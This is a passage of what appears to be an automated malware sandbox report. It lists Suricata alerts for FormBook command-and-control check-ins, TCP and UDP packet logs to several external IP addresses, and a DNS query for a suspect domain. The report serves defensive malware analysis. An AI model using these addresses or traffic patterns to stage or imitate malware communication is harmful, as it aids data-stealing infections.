                                                        RT_MANIFEST0xcfa4c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-14T13:57:48.287601+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54987674.208.236.15680TCP
                                                        2024-12-14T13:58:13.135481+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54993784.32.84.3280TCP
                                                        2024-12-14T13:58:27.974314+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54997413.248.169.4880TCP
                                                        2024-12-14T13:58:42.855703+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999366.29.149.4680TCP
                                                        2024-12-14T13:59:05.599670+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5499973.33.130.19080TCP
                                                        2024-12-14T13:59:20.733238+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550001129.226.153.8580TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 14, 2024 13:57:47.004306078 CET4987680192.168.2.574.208.236.156
                                                        Dec 14, 2024 13:57:47.125850916 CET804987674.208.236.156192.168.2.5
                                                        Dec 14, 2024 13:57:47.126070023 CET4987680192.168.2.574.208.236.156
                                                        Dec 14, 2024 13:57:47.136542082 CET4987680192.168.2.574.208.236.156
                                                        Dec 14, 2024 13:57:47.259510040 CET804987674.208.236.156192.168.2.5
                                                        Dec 14, 2024 13:57:48.286823988 CET804987674.208.236.156192.168.2.5
                                                        Dec 14, 2024 13:57:48.287511110 CET804987674.208.236.156192.168.2.5
                                                        Dec 14, 2024 13:57:48.287600994 CET4987680192.168.2.574.208.236.156
                                                        Dec 14, 2024 13:57:48.290663958 CET4987680192.168.2.574.208.236.156
                                                        Dec 14, 2024 13:57:48.410676003 CET804987674.208.236.156192.168.2.5
                                                        Dec 14, 2024 13:58:03.917156935 CET4991680192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:04.038310051 CET804991684.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:04.038542986 CET4991680192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:04.053226948 CET4991680192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:04.173101902 CET804991684.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:05.137665987 CET804991684.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:05.137732029 CET4991680192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:05.565126896 CET4991680192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:05.685291052 CET804991684.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:06.584413052 CET4992280192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:06.704556942 CET804992284.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:06.704716921 CET4992280192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:06.719878912 CET4992280192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:06.839624882 CET804992284.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:07.808528900 CET804992284.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:07.808578968 CET4992280192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:08.221782923 CET4992280192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:08.342319012 CET804992284.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:09.241120100 CET4992980192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:09.360852957 CET804992984.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:09.361150026 CET4992980192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:09.377326012 CET4992980192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:09.497114897 CET804992984.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:09.497251034 CET804992984.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:10.458525896 CET804992984.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:10.458597898 CET4992980192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:10.893193007 CET4992980192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:11.013139963 CET804992984.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:11.914134979 CET4993780192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:12.035083055 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:12.035279036 CET4993780192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:12.044943094 CET4993780192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:12.164910078 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135130882 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135185957 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135201931 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135217905 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135236979 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135252953 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135270119 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135293961 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135309935 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135339022 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:13.135481119 CET4993780192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:13.135481119 CET4993780192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:13.141870975 CET4993780192.168.2.584.32.84.32
                                                        Dec 14, 2024 13:58:13.262589931 CET804993784.32.84.32192.168.2.5
                                                        Dec 14, 2024 13:58:18.736624956 CET4995380192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:18.857059002 CET804995313.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:18.857160091 CET4995380192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:18.872714996 CET4995380192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:18.992408991 CET804995313.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:19.957495928 CET804995313.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:19.957711935 CET804995313.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:19.957781076 CET4995380192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:20.377691031 CET4995380192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:21.396769047 CET4996180192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:21.517035961 CET804996113.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:21.517163038 CET4996180192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:21.540038109 CET4996180192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:21.660065889 CET804996113.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:22.614831924 CET804996113.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:22.615063906 CET804996113.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:22.615144014 CET4996180192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:23.049432039 CET4996180192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:24.069324970 CET4996880192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:24.189335108 CET804996813.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:24.189505100 CET4996880192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:24.206391096 CET4996880192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:24.326586008 CET804996813.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:24.326781034 CET804996813.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:25.287416935 CET804996813.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:25.294833899 CET804996813.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:25.294909954 CET4996880192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:25.721390963 CET4996880192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:26.740461111 CET4997480192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:26.860809088 CET804997413.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:26.866388083 CET4997480192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:26.876534939 CET4997480192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:26.996403933 CET804997413.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:27.974051952 CET804997413.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:27.974113941 CET804997413.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:27.974313974 CET4997480192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:27.977288008 CET4997480192.168.2.513.248.169.48
                                                        Dec 14, 2024 13:58:28.100076914 CET804997413.248.169.48192.168.2.5
                                                        Dec 14, 2024 13:58:33.477210999 CET4999080192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:33.597186089 CET804999066.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:33.598434925 CET4999080192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:33.613781929 CET4999080192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:33.733705997 CET804999066.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:34.845520973 CET804999066.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:34.845593929 CET804999066.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:34.845727921 CET4999080192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:35.127634048 CET4999080192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:36.146920919 CET4999180192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:36.269495010 CET804999166.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:36.273049116 CET4999180192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:36.289052963 CET4999180192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:36.408838987 CET804999166.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:37.513147116 CET804999166.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:37.513277054 CET804999166.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:37.513338089 CET4999180192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:37.799452066 CET4999180192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:38.818593025 CET4999280192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:38.938465118 CET804999266.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:38.938630104 CET4999280192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:38.955112934 CET4999280192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:39.075079918 CET804999266.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:39.075095892 CET804999266.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:40.246109009 CET804999266.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:40.246185064 CET804999266.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:40.246325016 CET4999280192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:40.471595049 CET4999280192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:41.490575075 CET4999380192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:41.611202955 CET804999366.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:41.611454010 CET4999380192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:41.622231960 CET4999380192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:41.742327929 CET804999366.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:42.855201960 CET804999366.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:42.855285883 CET804999366.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:42.855703115 CET4999380192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:42.859872103 CET4999380192.168.2.566.29.149.46
                                                        Dec 14, 2024 13:58:42.980066061 CET804999366.29.149.46192.168.2.5
                                                        Dec 14, 2024 13:58:48.364816904 CET4999480192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:48.484919071 CET80499943.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:48.485097885 CET4999480192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:48.500756025 CET4999480192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:48.620676041 CET80499943.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:49.585004091 CET80499943.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:49.585037947 CET80499943.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:49.585123062 CET4999480192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:50.002592087 CET4999480192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:51.021918058 CET4999580192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:51.141671896 CET80499953.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:51.141798019 CET4999580192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:51.157341957 CET4999580192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:51.277158022 CET80499953.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:52.659024954 CET4999580192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:52.822421074 CET80499953.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:53.678965092 CET4999680192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:53.799165010 CET80499963.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:53.799269915 CET4999680192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:53.816894054 CET4999680192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:53.937163115 CET80499963.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:53.937226057 CET80499963.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:54.910409927 CET80499963.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:54.910460949 CET80499963.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:54.910521030 CET4999680192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:55.031193972 CET80499953.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:55.031290054 CET4999580192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:55.330740929 CET4999680192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:56.349888086 CET4999780192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:56.470038891 CET80499973.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:58:56.470149040 CET4999780192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:56.481589079 CET4999780192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:58:56.601557970 CET80499973.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:59:05.599287987 CET80499973.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:59:05.599363089 CET80499973.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:59:05.599669933 CET4999780192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:59:05.603451014 CET4999780192.168.2.53.33.130.190
                                                        Dec 14, 2024 13:59:05.723526001 CET80499973.33.130.190192.168.2.5
                                                        Dec 14, 2024 13:59:11.029496908 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:11.149708033 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:11.149811983 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:11.166127920 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:11.286492109 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.674499035 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:12.694175959 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694251060 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694288015 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694345951 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694361925 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:12.694384098 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694416046 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:12.694421053 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694452047 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:12.694456100 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694480896 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:12.694494009 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694499969 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:12.694529057 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694540024 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:12.694564104 CET8049998129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:12.694571018 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:12.694605112 CET4999880192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:13.707257986 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:13.827409029 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:13.827598095 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:13.875137091 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:13.995069981 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377321959 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377388000 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377425909 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377456903 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:15.377460003 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377496958 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377515078 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:15.377643108 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:15.377656937 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377693892 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377728939 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377743959 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:15.377768040 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377769947 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:15.377808094 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.377811909 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:15.377851963 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:15.497250080 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.497334957 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:15.497342110 CET8049999129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:15.497390032 CET4999980192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:16.396725893 CET5000080192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:16.516757011 CET8050000129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:16.516896009 CET5000080192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:16.543004036 CET5000080192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:16.662974119 CET8050000129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:16.663062096 CET8050000129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:18.049619913 CET5000080192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:18.169987917 CET8050000129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:18.170072079 CET5000080192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:19.068239927 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:19.188296080 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:19.188572884 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:19.200544119 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:19.320389986 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.732908010 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.732980967 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.733110905 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.733164072 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.733237982 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.733253002 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.733292103 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.733299971 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.733335018 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.733347893 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.733371019 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.733407021 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.733411074 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.733444929 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.733489990 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.853797913 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.853857994 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.854064941 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.857645988 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.908830881 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.962872028 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.962949038 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.963110924 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.967062950 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.967168093 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.967267990 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.975465059 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.975558043 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.975665092 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.983844042 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.983944893 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.984041929 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:20.992307901 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.992389917 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:20.992491961 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.000699997 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.000770092 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.000873089 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.009104013 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.009143114 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.009243965 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.017553091 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.017668009 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.017755985 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.026314974 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.026354074 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.026437044 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.034435034 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.034497976 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.034657955 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.042800903 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.042908907 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.043005943 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.083795071 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.083892107 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.084033012 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.192866087 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.192913055 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.193025112 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.195645094 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.195749044 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.195832014 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.201607943 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.203686953 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.203741074 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.203747034 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.209590912 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.209667921 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.209691048 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.215462923 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.215540886 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.215586901 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.221357107 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.221443892 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.221477032 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.225198030 CET8050001129.226.153.85192.168.2.5
                                                        Dec 14, 2024 13:59:21.225297928 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.229326963 CET5000180192.168.2.5129.226.153.85
                                                        Dec 14, 2024 13:59:21.349312067 CET8050001129.226.153.85192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 14, 2024 13:57:46.456940889 CET5754953192.168.2.51.1.1.1
                                                        Dec 14, 2024 13:57:46.996871948 CET53575491.1.1.1192.168.2.5
                                                        Dec 14, 2024 13:58:03.464025021 CET6462353192.168.2.51.1.1.1
                                                        Dec 14, 2024 13:58:03.914235115 CET53646231.1.1.1192.168.2.5
                                                        Dec 14, 2024 13:58:18.146872044 CET6502153192.168.2.51.1.1.1
                                                        Dec 14, 2024 13:58:18.733769894 CET53650211.1.1.1192.168.2.5
                                                        Dec 14, 2024 13:58:32.991055965 CET5803453192.168.2.51.1.1.1
                                                        Dec 14, 2024 13:58:33.473664999 CET53580341.1.1.1192.168.2.5
                                                        Dec 14, 2024 13:58:47.865967035 CET5372653192.168.2.51.1.1.1
                                                        Dec 14, 2024 13:58:48.362044096 CET53537261.1.1.1192.168.2.5
                                                        Dec 14, 2024 13:59:10.616056919 CET6534653192.168.2.51.1.1.1
                                                        Dec 14, 2024 13:59:11.024543047 CET53653461.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 14, 2024 13:57:46.456940889 CET192.168.2.51.1.1.10x8e66Standard query (0)www.christinascuties.netA (IP address)IN (0x0001)false
